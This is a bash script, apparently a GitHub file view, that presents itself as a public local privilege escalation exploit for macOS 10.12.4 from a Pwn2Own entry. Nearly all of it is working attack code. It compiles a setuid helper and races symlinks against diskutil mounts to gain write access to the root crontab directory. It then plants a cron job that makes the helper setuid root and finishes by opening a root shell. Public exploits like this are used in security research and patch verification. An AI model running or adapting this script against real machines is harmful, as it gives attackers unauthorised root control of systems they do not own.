Permalink
Cannot retrieve contributors at this time
#!/bin/bash | |
# | |
# macOS 10.12.4 local privilege escalation exploit by @_niklasb | |
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc | |
if ! security authorize system.volume.internal.mount &>/dev/null; then | |
echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work." | |
exit 1 | |
fi | |
TARGET=/private/var/at | |
SUBDIR=tabs | |
DISK=/dev/disk0s1 | |
TMPDIR=/tmp/pwn | |
mkdir -p $TMPDIR | |
cd $TMPDIR | |
cat << EOF > boom.c | |
#include <assert.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
int main(int argc, char ** argv) { | |
assert(argc == 2); | |
setuid(0); | |
setgid(0); | |
system(argv[1]); | |
} | |
EOF | |
clang boom.c -o _boom || exit 1 | |
race_link() { | |
mkdir -p mounts | |
while true; do | |
ln -snf mounts link | |
ln -snf $TARGET link | |
done | |
} | |
race_mount() { | |
while ! df -h | grep $TARGET >/dev/null; do | |
while df -h | grep $DISK >/dev/null; do | |
diskutil umount $DISK &>/dev/null | |
done | |
while ! df -h | grep $DISK >/dev/null; do | |
diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null | |
done | |
done | |
} | |
cleanup() { | |
echo "Killing child process $PID and cleaning up tmp dir" | |
kill -9 $PID | |
rm -rf $TMPDIR | |
} | |
if df -h | grep $DISK >/dev/null; then | |
echo 2>&1 "$DISK already mounted. Exiting." | |
exit 1 | |
fi | |
race_link & | |
PID=$! | |
trap cleanup EXIT | |
echo "Just imagine having that root shell. It's gonna be legen..." | |
race_mount | |
echo "wait for it..." | |
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom" | |
rm -f /var/at/tabs/root | |
echo "* * * * *" "$CMD" > /var/at/tabs/root | |
while ! [ -e $TMPDIR/boom ]; do | |
sleep 1 | |
done | |
echo "dary!" | |
kill -9 $PID | |
sleep 0.1 | |
$TMPDIR/boom "rm /var/at/tabs/root" | |
$TMPDIR/boom "umount -f $DISK" | |
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su" |